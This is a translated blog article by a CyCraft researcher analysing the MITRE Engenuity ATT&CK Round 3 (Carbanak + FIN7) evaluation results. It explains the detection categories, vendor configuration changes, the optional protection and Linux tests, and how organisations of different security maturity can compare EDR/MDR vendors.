NOTE: This article has been translated into English from the original Medium article in Chinese.
John Jiang, CyCraft Cybersecurity Researcher
Every year, the scale and scope of the ATT&CK Evaluations have gotten bigger, going more in-depth, and with more vendors participating; and each vendor doing everything they can to express their own value and worth to potential customers. Yet, this evaluation environment also creates a situation where each vendor could be a winner.
I would like to offer an opinion that I know differs from the opinions of the general public.
The general public believes that a vendors’ marketing material is biased and not worthy of reference. But when you need to evaluate a product carefully, seeing how these vendors interpret their own products is still very useful and important. After all, I honestly do believe in the value of our own products. Surely, my colleagues feel the same about theirs?
Participation in the ATT&CK Evaluations does not immediately validate a vendor or their products; conversely, a vendor’s lack of participation doesn’t necessarily invalidate their products either. Each participating vendor willingly subjects their own products to the evaluation and openly discloses the results to the public.
We should encourage more vendors to participate in such transparent evaluations so that buyers and end users can directly study how each product performs given the same attack scenario.
Last year, I went into granular detail explaining how best to interpret the ATT&CK APT29 Evaluation results and the detection categories. This year, I’d like to start from the more neutral point of view of an information security analyst to explain the differences this year and last year’s evaluations and how to look at this new evaluation from a perspective other than just data-driven.
And yes, I am a data scientist.
This year had six detection categories (listed from “worst” to “best”): N/A, None, Telemetry, General, Tactic, and Technique. These six categories were determined by the level of enrichment that accompanied each detection (e.g., Did it use the preferred data source to achieve this detection? Did it accurately label and correlate the detection to its corresponding ATT&CK framework tactic or technique?)
Only General, Tactic, and Technique detections were counted as Analytic Detections. While on the other end of the spectrum, N/A signifies that the vendor chose not to participate in this particular test step.
Those test steps were the new Linux portion as well as the Protections test; both of these were optional this year. Data Sources were added as auxiliary information this year, allowing users to see the type of data used by the vendor to achieve this detection.
For more detailed examples of detection content, what the ATT&CK Evaluations are, or what the ATT&CK Framework is, please refer to our previous blog articles:
Round 3 removed portions of the evaluation involving significant amounts of human intervention (e.g., MSSP, Host Interrogation, and Residual Artifacts). We have been closely observing the ATT&CK Evaluations since they started in 2018 and have participated in the last two rounds — APT29, Carbanak & FIN7.
We could see that while MITRE wanted to test the response of SOC/MDR service providers in the form of MSSP during Round 2’s evaluations, there was too much controversy — and rightly so — in the results.
After all, when you already know what the attacker has done (as well as the identity of the attacker themselves, which rarely happens), human intervention could definitely intuit something from the data. MITRE (now MITRE Engenuity, see here for why) decided to discontinue the MSSP portion of the evaluations for Round 3.
Round 3 removed detection modifiers that could not be uniformly quantified across all vendors, such as Correlated, Innovative, and Alert. As we mentioned in our article last year, Alerts are presented differently by each vendor; all solutions detect, but how they present this data to the end user differs. Correlated had similar issues; Innovative had good intentions behind it but proved to be far too subjective and difficult as each vendor’s approach from how they detect, respond, analyze, and present all this to the end user is ultimately unique. As we observed from last year’s alert ratio chart of each vendor, the way vendors present their solution’s collected data to the end user is quite different.
We also saw differences in vendor test strategy this year. 24 of the 29 vendors made configuration changes and delayed detections during the evaluation. Let’s briefly discuss the two here.
Vendors can opt to perform configuration changes after the initial execution of attack scenarios in one of three ways.
This modifier would be applied if the detection were not immediately made available to the MITRE Engenuity evaluation team due to various factors. 21 of the 29 vendors had delayed detections.
Here is a chart ranking all 29 vendors by the total number of configuration changes and delayed detections across all 174 attack substeps.
It also reflects that manufacturers have done their best to pull all detections to the technical/tactical level of detection. How successful were they? Here are some quick statistics for you.
In order for MITRE Engenuity to evaluate vendor solutions during an intrusion, protections on said solutions needed to be disabled or in alert mode only. For this round, vendors could opt to participate in an additional protection-oriented evaluation. This was the first round this optional evaluation extension was available to vendors.
MITRE Engenuity engineered 10 test cases — five for Carbanak and five for FIN7. In each test case, participants were not allowed to block certain malicious activities, such as lateral movement via pass-the-hash. Evaluators would then begin executing adversarial techniques step-by-step and determine when and if the test case attack would eventually be blocked by the solution.
As shown in the figure above, there are a total of 3+1 categories.
The protection categories divide the original attack scenario of 20 major attack steps into 10 tests — labeled Tests 1–5 and Tests 11–15. As shown in the example above (Test 4), as long as the subsequent attack techniques of one test are blocked, the attack will not continue to be tested.
In Test 4, when the emulated attacker wanted to execute Pass The Hash from Linux, they were blocked because the malware, impacket-psexec, landed through remote crawling. Therefore, the subsequent attack steps to be tested in Test 4 case will be listed in gray font, signifying they were not executed and would therefore not be tested.
Returning back to this section’s title, “The Completely New (But Not Really New) Evaluation, Protections,” MITRE Engenuity, as it appears to me, attempted to ensure that the protection categories wouldn’t be just another simple malicious program practice test. They wanted to test attack technique blocking for suspicious endpoint behavior — not just a static list of IoCs. This brings us back to the User Consent modifier.
Nowadays, antivirus (AV) software often encounters the dilemma that it is either too proactive, misjudges too often, or catches too little; as a result, AV software is often scoffed at by customers as being useless.
ATT&CK Evaluations is focused on testing techniques — not all of which are 100% malicious. Some are part of everyday network life but could be used with malicious intent. Should techniques in these gray areas be blocked or allowed? Some vendors choose to return these options to the user to decide and hence, the inclusion of the User Consent modifier in the protection categories.
Those following ATT&CK Evaluations will know that the emulated adversaries for Round 4 are Wizard Spider and Sandworm. The former is a financially motivated group that, since at least August of 2018, has been conducting ransomware attack campaigns. Ransomware attacks often take advantage of the gray areas we mentioned above, so here is my bold guess: there will be many User Consent modifiers during the Protection Categories next round.
In Round 3, only 17 of the 29 vendors participated in the Protection Categories. There are many ways to interpret this data. Let’s take a closer look at Test 3: UAC Bypass and Credential Dumping.
In Test 3, 12 of the 17 vendors deleted the smrs.exe (actually mimikatz) malware after it landed. Only 4 vendors did not block mimikatz but did block it in the follow-up behavior. One vendor even discovered that the computer was broken in the exam. So it is a pity that the results this time weren’t too revealing and were unable to give transparency into how each vendor deals with detecting and blocking gray behavior. But after all, this was the first time that the ATT&CK Evaluations had conducted protection-related evaluations. Here’s another bold (but not really) claim: there will be many changes to the protection categories for Round 4.
The following picture shows McAfee deleted smrs.exe when it landed.
After its absence in the first two rounds, Linux was finally included in the evaluations for the first time; however, as not all vendors support Linux, this, like the protection categories, was completely optional.
In many security incidents, Linux-based attacks are where defenders often seriously lack visibility, yet virtually all cloud-based technology and external servers are run completely on Linux. Improving visibility, detection, and response capabilities in Linux environments is important. This begs the question:
A tiny fraction of the 147 attack substeps were dedicated towards Linux. I summarize the Linux category into 3 tests: basic endpoint monitoring capabilities, protections (lateral movement and pass the hash), and, most importantly, interactions across endpoints.
This covers the basic ability of an EDR. Users should be able to see the executed instructions and provide the time, endpoint, and instruction content. All of these were tested in the Linux Category for Round 3.
The following is taken from Elastic’s evaluation results.
Unfortunately, the overall results did not yield many highlights. After all, antivirus vendors (or vendors who started out with AV solutions and then later incorporated different solutions as the market evolved) should be used to these types of examinations.
However, only a few vendors can support Linux, and fewer participated in the protection categories. If protecting Linux hosts is a priority for you, these examinations should prove more and more valuable to you as MITRE Engenuity matures them in the years to come.
The following is taken from Cybereason’s evaluation results:
This is definitely the most important part of the Linux evaluation because most of the vendors who participated in this portion of the evaluation were prepared to detect Linux-based attacks. The results were very close in terms of data alone.
However, the predicament many real environments today face is the combined complexity of the survey interface and the large amount of raw data that slows down the said survey’s speed. However, vendors with the EDR solutions with both Linux and Windows visibility may have separate operating interfaces; therefore, the interactions between endpoints with different OS and the vendor’s capability to monitor, detect, and respond can be tested.
The following figures are taken from the evaluation results of the same attack step from CyCraft (top) and MicroFocus (bottom).
As a data scientist, I’m always thinking about what data tells me, and, sometimes more importantly, what data doesn’t tell me. When using evaluation result data to compare vendors, what can’t be expressed by the data at face value?
I think “Vendor Configuration” is something that needs to be made more visible to end users viewing ATT&CK Evaluation result data. When you are interested in the “result data” of a vendor, you need to look carefully. For example, let’s take a closer look into Elastic’s configuration.
Elastic did not add its own EDR to the evaluation this year. Instead, it used the combination of winlogbeat, sysmon and Elastic for the evaluation. This is actually a big change. Elastic switched to using free tools on its own. The reasons for these changes may be for commercial promotion or for the benefit of the public. Regardless of the reason, it is an interesting point that is completely invisible when only looking at the data at face value.
In addition to the changes in Detection Categories, MITRE Engenuity also removed the detection modifiers Alert and Correlation; however, the concepts of “alert” and “correlation” aren’t completely removed from the evaluation results.
Instead, MITRE Engenuity presents this data in another way and from a slightly more neutral perspective. When opening a vendor’s Carbanak+FIN7 results page, you immediately see three important things highlighted at the top of the page: the vendor’s alert strategy, their correlation strategy, and screenshots of their solution.
Why is this the highlight of this evaluation? If you rummage through all these results, you will find that the detection capabilities of good vendors are fairly similar; however, they are very different in terms of data presentation.
Understanding the workflow, UI, and UX of any information security technology should be at the top of your checklist when shopping for new solutions — especially for larger organizations. The more endpoints you have, the more noise your solutions potentially generate, which leads you to this very important question.
After researching the results of all the vendors, you should find these common challenges with most vendors’ solutions:
Remember that false positives were not considered in the evaluation. The number of endpoints used in the Carbanak + FIN7 evaluation could be counted on only two hands. If the number of endpoints were increased (as they are in a real MDR environment), the number of false positives would increase, magnifying these challenges several times over.
MIA MSSP
As mentioned earlier in this article, for Round 3 Evaluations, MITRE Engenuity removed the MSSP detection category from the previous round. MSSP’s implementation in Round 2 did cause some controversy, so its removal in Round 3 is understandable. It is a pity we couldn’t view more in-depth data on and analyze the capabilities of various vendors’ MDR/security analyst teams.
Just like last year’s article, I want to end on something actionable for you, the reader. The number of ATT&CK Evaluation participants has only increased (from 12 to 21 to 29), and there’s no reason to see this momentum slow down in the years to come; this means that the ATT&CK Evaluations — be they run by MITRE or MITRE Engenuity — will annually release more and more data on vendors for buyers, analysts, and vendors to dissect, study, and market. With so much data to analyze each year, it’s critical for buyers to keep focus on these key factors when choosing a cybersecurity solution or vendor.
Information Security Defense Strategy:
This term encompasses a wide range, but what I want to mention here is that you should first know (with 100% confidence) where your strengths, as well as your defensive gaps, are. There are well over 200 ATT&CK adversarial tactics and techniques. Know which ones are a priority to your organization and which ones prove to be the biggest threat to your industry. Triage your priorities. Determine which vendor or solution best compliments your defense and fills in most of your defensive gaps.
Realistic Workflow, UI, UX:
If you have limited information security personnel or resources, I recommend that you consider selecting solutions with dashboards your information security personnel can understand clearly and quickly. One of the most overlooked benefits of the ATT&CK Evaluations is the screenshots of each dashboard accompanied by the Alert and Correlation strategies of each vendor. Have your team create UI and UX metrics for viewing and rating dashboards and immediately eliminate unintelligible dashboards from consideration.
Visibility & Coverage:
When Round 3 evaluation results were released this year, MITRE Engenuity also made several big changes to their webpage. One of the biggest changes was the inclusion of 4 metrics of each vendor’s overview page: Detection Count (total detections in the evaluation), Analytic Coverage (number of attack substeps that had a general, tactic, or technique detection), Telemetry Coverage (number of attack substeps that had a telemetry detection), and Visibility (number of attack substeps with either a telemetry or analytic detection).
It is a bit odd that by creating metrics, MITRE Engenuity indirectly created a score, which MITRE (and MITRE Engenuity) stated that they wouldn’t do in the ATT&CK Evaluations. But these terms can be easily misunderstood, as better in one metric doesn’t always mean best.
High detection counts may mean noise amplification. Telemetric Coverage is good for post-breach IR and log compliance but not so useful during a live attack, so naturally, Visibility can be misleading as it also includes Telemetric Coverage. Analytic Coverage with Detection Count could inform you of the ratio of enriched detections you will receive during an attack. However, no matter how many detections are made, if your team experiences a high amount of friction in workflow, UI, or UX, then the detection count might not matter that much.
Use these metrics (Detection Count, Analytic Coverage, Telemetry Coverage, and Visibility) alongside your metrics for Workflow, UI, and UX to help filter out vendors with more effective and actionable intelligence; solutions that perform automated triage for detections could prove especially useful for your team.
In last year’s article, we discussed how organizations at different maturity levels should analyze ATT&CK Evaluation results. Although 6 years can be seen as a long time in the tech industry, the ATT&CK framework (at six-years-old) is still nascent, with more and more off-shoot projects appearing, such as the recent release of D3FEND. As more and more new organizations begin to explore and invest in MDR, we wanted to give a more actionable approach to analyzing the ATT&CK Evaluation result data this year.
The first thing to do is to assess your threats. Only when you understand the active and emerging threats you are facing — as well as the threats leadership wants prioritized — can you make the most effective and impactful procurement and information security plan, yielding the best ROI. Security isn’t easy. It takes time and cooperation across departments. The first step may be the one that takes the most time. You can start with the following:
You’ve identified the active and emerging threats targeting your industry and are even familiar with their documented behavior. The next step is to alter this intelligence into a language that is quantifiable and able to be evaluated. This is where the ATT&CK framework becomes exceedingly beneficial.
Let’s take a closer look at a practical (and unfortunately common) example. Your organization has been targeted by a spearphishing campaign. Spearphishing emails caused users to execute macros on word files. The macros executed malicious VB scripts and then used mimikatz to gain admin status. The attackers then passed the hash, giving them access to other endpoints.
This attack could be expressed using the following ATT&CK framework adversarial techniques:
After all, the active and emerging threats are sorted and converted into ATT&CK, identify adversarial techniques that your current security stack has difficulty detecting or that your SOC team considers to be the most painful to investigate, such as techniques that require contextual judgment — for instance, Use Alternate Authentication Material: Pass the Hash (T1550.002).
Evaluate how vendors handled those specific techniques. Don’t forget to pay close attention to Configuration Changes during your evaluation, as the evaluation settings for that particular solution will most likely differ if integrated into your environment. We recommend using the official MITRE Engenuity Technique Comparison Tool.
Cybersecurity vendors — not just MDR vendors — often tailor services to fit a customer’s unique set of needs for their unique environment and concerns; the 29 vendors participating in the Carbanak + FIN7 MITRE Engenuity ATT&CK Evaluations are no exception. Each organization has a unique set of needs depending on their industry and size. One of the most important factors is cybersecurity maturity level. Below is a helpful guide for organizations at different cybersecurity maturity levels and how they can get the most out of the ATT&CK Evaluation results.
Small and medium-sized organizations typically do not have sufficient information security personnel to be able to detect, investigate, or respond to each incident or alert. At this maturity level, it is advisable to prioritize selecting a vendor that provides MSSP/MDR services. Since MSSP was not tested this year, you will need to perform this assessment yourself (See Step 3 above). You can also use this screening process to help you find a vendor faster:
Money, especially budgeted for information security, has often been spent on a knife’s edge. After narrowing down your selection of vendors, analyze how they performed in previous evaluations. Did the previous rounds’ emulated threat actors use similar ATT&CK techniques? How did the vendor’s performance on that particular ATT&CK technique compare across the multiple evaluations? Solutions, like your organization, are not static; they evolve and improve over time. Is the vendor developing and improving their solutions?
With full-time security analysts, you need enriched threat intelligence to guide effective and impactful analyses and investigations. Features such as automated triage and investigations help alleviate SOC pain points, allowing for a more effective team with time for more proactive defense strategies. You can also use this screening process to help you find a suitable vendor faster:
Prioritizing and understanding a security product’s realistic workflow, UI, and UX is important for organizations at this maturity level. Let’s look at a specific Telemetry Detection example.
Below are screenshots taken from Carbon Black VMWare and FireEye. Both are dealing with the same attack substep: Use Alternate Authentication Material: Pass the Hash (T1550.002); however, how each platform presents this data is very different. Presentation and your team’s understanding of it will greatly affect investigation and response speed.
Although your SecOps operates 24/7, your security personnel cannot spend 24 hours a day sitting in front of computer screens looking at raw telemetry data. Time becomes a much more valuable resource as SecOps tend to incorporate multiple necessary tasks.
Once again, features such as automated alert triage and automated investigations can help alleviate SOC pain points, allowing for a more effective and proactive team. You can also use this screening process to help you find a suitable vendor faster:
In our previous example, we compared Telemetry Detections and hinted at how the design and layout of a product’s interface could affect investigation speed. For this example, we will look at two Technique Detections. When able to accurately detect adversarial ATT&CK techniques, some vendors present Raw Data as Auxiliary Data while some vendors actively work on designing intuitive dashboards to help SOC teams reduce MTTR (mean time to respond).
Rounds 1 and 2 were managed directly by MITRE. Round 3 was managed by MITRE Engenuity who will manage all future evaluation rounds. First and foremost, I want to commend MITRE Engenuity for their hosting and attempts at being more neutral in evaluations. I look forward to seeing how they will continue to improve the evaluations.
The number of participating vendors has increased and will likely continue to increase for, at least, the next few years.
However, vendors are becoming more and more familiar with evaluation methods and are getting better at configuration changes. In Round 3, out of all the detections made due to configuration changes, 17.6% resulted in Telemetry detections, 9.6% resulted in General detections, 4.9% resulted in Tactic detections, and 67.9% resulted in Technique detections.
For better or worse, the ATT&CK Evaluations (as well as the heavily marketed results) do have a sense of an arms race within the cybersecurity industry.
While the detection capabilities of vendors are similar, cybersecurity vendors who provide more effective and actionable intelligence and present said intelligence in a more simple, intuitive, and thorough way to security teams can truly stand out.
Information regarding the next round of the MITRE Engenuity ATT&CK Evaluations also came out much more quickly than last year. I am looking forward to the next round, Wizard Spider and Sandworm. Cybersecurity Twitter space has been dominated with talks and discussions on ransomware, so Wizard Spider’s inclusion for Round 4 seems like the logical step forward. Seeing how each vendor deals with ransomware (detection, response, and data presentation) will be extremely beneficial.
Despite any flaws or misgivings, anyone may have on the evaluation process, the ATT&CK Evaluations are incredibly useful to not only end users and analysts but also the vendors themselves as they get feedback on the efficacy of their solutions and how well those solutions incorporate ATT&CK framework terminology into their UI/UX, which is then ultimately and potentially even more beneficial for the end user.
Writer: CyCraft
CyCraft(サイクラフト)は、AIによる自動化技術を専門とするサイバーセキュリティ企業。2017年に設立され、台湾に本社、日本とシンガポールに海外拠点を持つ。アジア太平洋地域の政府機関、警察・防衛機関、銀行、ハイテク製造業にサービスを提供している。CyCraft の AI技術 と機械学習技術によるソリューションが評価され、CID グループ とテマセク・ホールディングス旗下のパビリオンキャピタルから強力なサポートを獲得し、また、国際的トップ研究機構である Gartner、 IDC、Frost & Sullivan などから複数の項目において評価を受けている他、国内外の著名な賞をいくつも受賞している。また、国内外を含む複数のセキュリティコミュニティ、カンファレンスに参画し、長年にわたりセキュリティ業界の発展に尽力している。